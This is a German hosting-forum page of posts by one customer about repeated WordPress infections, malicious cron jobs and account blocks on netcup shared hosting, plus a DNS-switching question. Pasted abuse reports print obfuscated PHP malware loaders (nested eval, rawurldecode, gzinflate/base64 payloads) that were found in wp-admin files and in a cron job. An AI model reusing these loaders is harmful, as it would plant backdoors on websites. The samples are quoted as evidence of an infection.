Posts by monotron

Quote from Schupp

Vielleicht kann es sein das ein crontab von PHP im userspace angelegt wurde, dieser wurde dann nur in Plesk aufgelistet.

Nur so als Idee.

Solange es verschiedene Passwörter sind, wäre es ja eher unwahrscheinlich das der "Plesk User" zusätzlich kompromittiert wurde.

Ja, dass Problem ist aber, bist du im CCP, kannst du einfach auf "Autologin Web" klicken und bist im Plesk, ohne dein Plesk-Passwort einzugeben. Anders ist es im Plesk, da kannst du dich direkt einloggen, aber ohne Zugriff auf das CCP.

Quote from KB19

Ein Cronjob im Plesk-Panel, bei einem Webhosting-Paket? Gar nicht, sofern der Server nicht als ganzes kompromittiert wurde, was sehr unwahrscheinlich ist. Da hat offensichtlich irgendjemand Deine Zugangsdaten fürs CCP und/oder Plesk!

Ändere unbedingt sofort Dein CCP-Passwort und vergib direkt in Plesk für den Plesk-Zugang ein neues Passwort. Das von Deinem E-Mail-Account solltest Du sicherheitshalber auch ändern. Zusätzlich solltest Du sofort alle verwendeten Endgeräte (PC/Notebook/Tablet/Handy/…) auf Schadsoftware scannen. Denn wenn Du nicht gerade auf Phishing hereingefallen bist, muss das Passwort ja irgendwo entwendet worden sein.

Und informiere netcup unbedingt, dass wahrscheinlich Deine Zugangsdaten entwendet wurden. Die sollen entsprechende Schritte setzen und z.B. auch Logdateien der (fremden) Zugriffe sichern.

Ich habe nach er ersten Komproimitierung schon auf 2FA umgestellt und alle Passwörter geändert. Die Admin-eMail Adressen laufen nicht über Netcup, dass habe ich schon immer getrennt. Da hat keiner Zugriff drauf.
Phishing ist auch 100% ausgeschlossen.

Aber interessant, wenn es technisch keine Schnittstelle gibt..... Regt einem schon zum Denken an....

EDIT: Ich habe sicherheitshalber trotzdem, nochmal CCP und Plesk geändert. Bei CCP läuft eh eine 2FA, dennoch, sicher ist sicher!

Quote from MyMattes

Auch wenn es jetzt das Offensichtliche ist - Du hast es nicht explizit erwähnt: Hast Du denn neben den geleerten Domain-Verzeichnissen auch verifiziert, dass in Plesk keine Cron-Jobs mehr definiert sind? Oder tauchen dort ominös neue auf? Dann solltest Du Gedanken über Deine netcup-Credentials machen (mir wäre nicht bewusst, dass im Shared Webhosting ohne diese Cronjobs angelegt werden können).

Freitag habe ich genau das gefunden! Mega peinlich! Das ich auf einem vServer oder Root-Server eigene CronJobs einrichten kann, ok. Das ich aber bei einem Webpaket CronJobs einrichten kann, dass wusste ich nicht! Und da waren ca. 15 Einträge drinnen die jede Sekunde getrioggert worden sind. Die habe ich gelöscht. Danach war erstmal ruhe. Hab dann eine eigentlich infizierte Seite zurückgespielt, soweit ich sehen konnte, alles bereinigt, heute war leider trotzdem wieder ein neuer CronJob drinnen.

Weiß einer, wie jemand über ein eventuell infiziertes Wordpress auf meinem Webspace einen festen CronJob einrichten kann!? Ich könnte es mir ja noch erklären, wenn es ein WP-Cron ist. Aber hier sind es richtige CronJobs.

Naja, ich sag immer, kein Backup, kein Mitleid. In dem Fall, Backup, was mir nicht wirklich etwas bringt weil ich damit den ganzen Müll wieder zurückspiele. Also muss ich wohl alles von Hand neu machen und die Daten stück für Stück manuell übernehmen um sicher zu sein, dass nicht wieder irgendwas komisch rüber kommt.

Ich habe den Support mal angeschrieben, wie das geht, dass irgendwer über die Webserver auf dem Server einen CronJob initiieren kann. Ich würde das gerne fest unterbinden.....

Wow, hier sind ein paar richtig gute Hinweise!
Dafür erstmal vielen Dank! Ich werde da mal ein paar Dinge auf dem anderen Server testen. Bei Netcup aber habe ich quasi nichts mehr. Also alle WP Instanzen gelöscht... Bin aber diese Woche jetzt wieder zum dritten mal gesperrt weil Netcup sagt, ich hatte kompromittierte WP Installationen und eine davon würde Spam verschicken... Ich weiß gar nicht, was ich noch machen soll, mein Space ist leer... Das schlimme ist, meine Kunden können in den Sperrungen auch keine Mails mehr senden oder empfangen.... Das ist eine Katastrophe...

Ich bin so hart gefrustet, was soll ich noch tun außer meinen Space leer machen!?!?!?

Der Abuse Hinweis von gestern war noch abstruder, betroffene Datei und betroffenen WP Installation sind von einer anderen Kundennummer mit einer Webseite die ich gar nicht kenne. Die betreffen meinen Space noch noch einmal... Ich weiß nicht was da ab geht.

Ich habe seit zwei Wochen, keine Homepage mehr gehostet und trotzdem werde ich die ganze zeit gesperrt... Die Links in den Hinweisen, wie gesagt, gehören mir entweder nicht oder sind noch Files die schon seit Wochen gelöscht sind... Was will Netcup denn noch von mir

Angehangen mal beide Abuse Hinweise. Unten ist meiner, der sieht aus wie das was @proxypunkt beschreibt. Eine Mail die Local an den Lokalen Server gehen soll....

Hier mal der Abuse Hinweis, der überhaupt nicht zu mir gehört (andere Kundennummer und un bekannte Webseite, Daten unkenntlich gemacht)
========== Abusemeldung / Abuse report ==========

/var/www/vhosts/hostingXXXXX.a2fb5.netcup.net/httpdocs/XXXXX/wp-admin

admin-header.php:2:eval(rawurldecode('function%20_1b87%28%24_rLojswb7%29%7B%24_rLojswb7%3Dsubstr%28%24_rLojswb7%2C%28int%29%28hex2bin%28%2731313837%27%29%29%29%3B%24_rLojswb7%3Dsubstr%28%24_rLojswb7%2C%28int%29%28hex2bin%28%2730%27%29%29%2C%28int%29%28hex2bin%28%272d343930%27%29%29%29%3Breturn%20%24_rLojswb7%3B%7D%24_rMdCfk6gt%3D%27_1b87%27%3B%24_Zrswx9%3D%27base64_decode%27%3Bfunction%20_vJ1CephpvaekdnbFfeM5%28%24_pLOGD%29%7Bglobal%20%24_rMdCfk6gt%3Bglobal%20%24_Zrswx9%3Breturn%20strrev%28gzinflate%28%24_Zrswx9%28_1b87%28%24_pLOGD%29%29%29%29%3B%7Deval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28_vJ1CephpvaekdnbFfeM5%28%27Am6ymOpqGZsgThier folgt eine elendig lange Zeichenkette ohne sinnvollen Inhalt....

afjplcew.php:2: goto Fy6Bg; Fy6Bg: error_reporting(0); goto MqCa6; MqCa6: function MhAJ1() { goto a6tUo; a6tUo: $ir7ui = 'I could not have a more welcome visitor 64 group of zain bani'; goto CNE2N; rf2hk: return $Wfnym; goto dm0zR; CNE2N: $Wfnym = $ir7ui[15] . $ir7ui[14] . $ir7ui[13] . $ir7ui[5] . '(' . $ir7ui[43] . $ir7ui[52] . $ir7ui[4] . $ir7ui[8] . $ir7ui[2] . $ir7ui[3] . $ir7ui[19] . $ir7ui[47] . $ir7ui[21] . $ir7ui[15] . $ir7ui[34] . $ir7ui[34] . '(' . $ir7ui[57] . $ir7ui[13] . $ir7ui[34] . $ir7ui[15] . $ir7ui[40] . $ir7ui[41] . '_' . $ir7ui[6] . $ir7ui[15] . $ir7ui[2] . $ir7ui[3] . $ir7ui[6] . $ir7ui[15] . '(''; goto rf2hk; dm0zR: } goto Oj7O3; Oj7O3: eval(MHaJ1() . hier folgt eine Riesen Zeichenkette ohne sinnvollen inhalt

Und hier der Hinweis, der mich angeblich betroffen soll von einer Datei die schon lange nicht mehr existiert:
========== Abusemeldung / Abuse report ==========

hostingXXXX = XXXX



*** ENVELOPE RECORDS hold/B715284BF2 ***

message_size: 2489 776 1 0 2489 0

message_arrival_time: Thu May 16 12:52:03 2024

create_time: Thu May 16 12:52:03 2024

named_attribute: log_ident=B715284BF2

named_attribute: rewrite_context=local

sender: hostingXXXX@hostingXXXXa2fb5.netcup.net

named_attribute: encoding=8bit

named_attribute: log_client_name=localhost

named_attribute: log_client_address=127.0.0.1

named_attribute: log_client_port=56160

named_attribute: log_message_origin=localhost[127.0.0.1]

named_attribute: log_helo_name=a2fb5.netcup.net

named_attribute: log_protocol_name=ESMTP

named_attribute: client_name=localhost

named_attribute: reverse_client_name=localhost

named_attribute: client_address=127.0.0.1

named_attribute: client_port=56160

named_attribute: server_address=127.0.0.1

named_attribute: server_port=10025

named_attribute: helo_name=a2fb5.netcup.net

named_attribute: protocol_name=ESMTP

named_attribute: client_address_type=2

named_attribute: dsn_orig_rcpt=rfc822;hostingXXXX@a2fb5.netcup.net

original_recipient: hostingXXXX@a2fb5.netcup.net

recipient: hostingXXXX@a2fb5.netcup.net

*** MESSAGE CONTENTS hold/B715284BF2 ***

Received: by a2fb5.netcup.net (Postfix, from userid 31074)

id 4B73384BFC; Thu, 16 May 2024 12:52:01 +0200 (CEST)

From: hostingXXXX@hostingXXXX.a2fb5.netcup.net

To: hostingXXXX@a2fb5.netcup.net

Subject: Cron <hostingXXXX@a2fb5> /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJrj5pAFP3ur6CJCZpuGpBFa5qm3bqiWJEVVx1oGgPDoOgwsDCg0Ox/7+B7H0k7yTB3mHvOPfdRiVZRJyTezMa+a1NU483HUNAJjfT1XQsW4U67HzdVv90wgZq5kisNJSt0pJEA8/b+tOcy0R67sn6/kYZBN7cCVRwGMnZ7IxF25NQC48zuGwLsGZkpaZnbUzILWNghRjGU3AwGxhYGs4LxSbAjRk4wSty5gdl9bYIfKzPAiQ2MyAJaCnurrboutXVLbSxm6HvBrGHOdw7A2xD0ZAix8AQ6q/K+AZMIDpS2M56INgBJw5tRBBTq/sQ7Zy7KcCBufebjgI4LVSyqM8UYg2JaGPfmztjMTv8Z184tuUCJ72CG30Zz8bYFJmHLI5qvNzZNbU0Lfa3luj+4Y/mtnM5yA8SRMsUW2wmZKMZ0qnwWNWHc0KaWMhCFSM/Vlv0YFrqkMbzZVImMQF97ssgsNSUjchosn5xKUGnnTmOHoSRTln+br3+peCmB1A8J97qD1QTFde5PpcKxhf2EcrWql2L8YNPVDVdN8oSioEsyZsPQReyIbEpRTOrcVy4lDO0zqgLVHDtBzduFi0q3Ay2LW7JWkzCNIWL+no/RYonoAoaEIkKTS6yjr+9xtShGy0VgU7iqvYh/oKmXarnjihFNY3KAPp8JPlwzHOWe8czYv6DkH0wH7T6BYRwjSA20RDuWQ0LjRYwibEM2/ojnPnF8Zu8PzN9w/Pdvdhzvr3bOXxfwVAyCtpNTPfY6T2SvQjEu/pL0O+BrIaeUfgm/j41iCh76D4uuPmTWy+czyZH18nlTvOvyX2D/U7ey1QH1g1Pb9/ZVu7mPnCgcYCnBPtm8GYX9sETpe8PyThI0TEvBVx7nqMzjufIX")));'

MIME-Version: 1.0

Content-Type: text/plain; charset=US-ASCII

Content-Transfer-Encoding: 8bit

X-Cron-Env: <SHELL=/opt/psa/bin/chrootsh>

X-Cron-Env: <HOME=/var/www/vhosts/hostingXXXX.a2fb5.netcup.net>

X-Cron-Env: <PATH=/usr/bin:/bin>

X-Cron-Env: <LOGNAME=hostingXXXX>

Message-Id: <20240516105203.4B73384BFC@a2fb5.netcup.net>

Date: Thu, 16 May 2024 12:52:01 +0200 (CEST)

X-NC-CID: MuePkLpVeDGmwfUB/6udsswM014GBpClO99rIQ21YjTTdjeZg2Ira8eQ15QJiw==

X-MORS-Enabled: yes

X-MORS-DOMAIN: a2fb5.netcup.net

X-MORS-HOSTING: hostingXXXX

X-MORS-USER: hostingXXXX

X-Rspamd-Queue-Id: B715284BF2

X-Spamd-Result: default: False [-1.60 / 15.00];

BAYES_HAM(-5.50)[99.99%];

LONG_SUBJ(3.00)[968];

MID_RHS_MATCH_TO(1.00)[];

MIME_GOOD(-0.10)[text/plain];

FROM_EQ_ENVFROM(0.00)[];

MIME_TRACE(0.00)[0:+];

RCVD_TLS_LAST(0.00)[];

TO_DN_NONE(0.00)[];

FROM_NO_DN(0.00)[];

RCVD_COUNT_TWO(0.00)[2];

MID_RHS_MATCH_FROMTLD(0.00)[];

RCPT_COUNT_ONE(0.00)[1];

TO_MATCH_ENVRCPT_ALL(0.00)[];

ARC_NA(0.00)[]

X-Rspamd-Server: rspamd-worker-8404

X-MORS-Enabled: yes

X-MORS-DOMAIN: hostingXXXX.a2fb5.netcup.net





XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 6

*** HEADER EXTRACTED hold/B715284BF2 ***

named_attribute: encoding=8bit

*** MESSAGE FILE END hold/B715284BF2 ***

Langsam bin ich hart genervt. Letztes Jahr verursachte eine vermutliche Sicherheitslücke im Wordpress (anders kann ich es mir nicht erkören) zu einer Schadcode-Einführung. Daraufhin folgte der erste Abuse-Hinweis. Den konnte ich natürlich verstehen. Also, das Wordpress bereinigt, infizierte Dateien gelöscht, im Grund das Wordpress neu installiert. Die Daten aus der Datenbank übernommen.
Ich habe alles auf automatischen Updates laufen.
Danach wurden nach und nach alle WP Installations (ca. 5-6 Stück), trotz Updates und Passwort-Änderungen mit dem selben Schadcode infiziert. Immer wenn ich eine Seite bereinigte, tauchte der Schadcode nach 1-2 Stunden wieder auf.
Testweise habe ich dann eine Webseite auf einen anderen Server migriert, dort bereinigt, keine Probleme mehr.
Also nachgelesen und herausgefunden, dass dieses Problem durch einen Fehler in der PHP Konfiguration kommen KANN. Muss nicht, es kann ja immer noch ein Problem im Wordpress Core sein. da aber auch WP-Installationen befallen waren, die genau in der Konfiguration auf anderen Server schon seit Jahren laufen und andere wiederum gar keine Plug-Ins installiert hatten, habe ich Netcup angeschrieben und darum gebeten, dass sie die Infrastruktur bitte auf ein Problem hin prüfen, besonders in Richtung PHP-Cron.

Naja, was soll ich sagen, wieder Abuse-Hinweis, alles gesperrt und keine Antwort.

Das geht jetzt seit Monaten so. Aber jetzt wird es richtig lustig, ich habe bei den Abuse-Hinweisen immer nochmal darum gebeten, dass sie auch die Server prüfen, auch da keine Reaktion. Beim letzten Abuse.-Hinweis habe ich dann angefangen alle Seiten auf einen Fremdserver zu übertragen. Also sind nur noch die Domains und Mail-Server bei Netcup.
Und was passiert am WE? Netcup sperrt meinen Account wegen einer angeblichen Spam-Mail vom 30.04. (zwei Wochen her) von einer Webseite die faktisch nicht mehr auf dem Server liegt...

Naja, alle meine Kunden und ich können keine Mails mehr empfangen und ich warte jetzt Seite 1,5 Tagen darauf, dass sie meinen Space freischalten damit ich einen Screenshot machen kann um ihnen zu zeigen, dass ich gar keine Daten mehr bei Netcup habe...

Mit dem ganzen Support für meine Kunden und der Problemanalyse und den Ausfällen habe ich/meine Kunden derweil ca. 5 Stellige € Verlust bzw. Kosten die entstanden sind. Und Netcup antwortet mir NULL.

Als IT-Admin verstehe ich das, dass man im Zweifel sperren muss, dass sehe ich ein. Aber wenn ein Kunde sagt, "Leute, ich glaube da stimmt was mit der PHP-Konfiguration nicht", dann erwarte ich, dass das geprüft wird. Meine Installationen sind mein Problem, deren Infrastruktur aber ist deren Problem.

Wenn sie dann sagen würden, wir haben alles geprüft, bei uns ist alles sauber, OK: Aber auch eine PHP Version kann Probleme haben und so etwas verursachen. Aber das interessiert sie nicht.
Na ja, Ende vom Lied, ich ziehe den Space nun nach über 7 Jahren von Netcup weg... Das kostet ohne ende Zeit und ohne ende Nerven und viele Erklärungen in Richtung meiner Kunden.

Danke Netcup, für nichts...

Nochmal eine kurze Aufklärung.

Es ist tatsächlich so, wechselt man den DNS zurück auf Netcup, muss/sollte man die Checkbox aktivieren. Er speichert dann auch, übernimmt es aber nicht. Danach öffnet man eine andere Domain damit er die Daten der gerade umgestellten neu lädt. Dann wählt man erneut den Netcup-DNS. Er zeigt die Netcup DNS einstellungen an inkl. aller DNS Konfigurationen für die Domain. Jetzt nur noch speichern ohne die Checkbox aktiviert zu haben, fertig.

Getestet habe ich es mit einem Mac auf dem Safari und dem Firefox. Bei beiden das selbe Verhalten.

Hallo Bensen,

ich habe es jetzt mit einem anderen Browser getestet. Zu meiner Schande habe ich nicht an den Cache gedacht. Aber daran lag es nicht. Es war scheinbar ein ganz anderer Fehler. Ich habe den DNS auf "Netcup" umgestellt und habe die Checkbox für "Standard DNS Einstellungen setzen für Hosting*****" gesetzt. Damit wurden die Daten wohl nicht übernommen. Ohne die Checkbox zu aktivieren hat er es jetzt gemacht.

War wohl nur ein Verständnisfehler. Ich danke dir für die schnelle Reaktion!

Hallo Mitkunden,

folgendes, ich habe eine Anzahl an Domains geparkt und die Sedo-DNS eingetragen. Jetzt wollte ich davon zurück auf den Netcup-DNS umstellen. Sieht erstmal gut aus, wenn ich die Einstellungen der Domain dann erneut aufrufe stehen dort wieder die Sedo-DNS drinnen.

Mir wird zwar beim Speichern angezeigt das die Änderungen bis zu 48 Stunden dauern können, dass bezieht sich aber doch letztendlich nur darauf, dass es bis zu 48 Stunden dauern kann, bis alle DNS die Änderungen mitbekommen haben.

Hat dafür jemand eine Lösung oder muss man hier wirklich nur warten?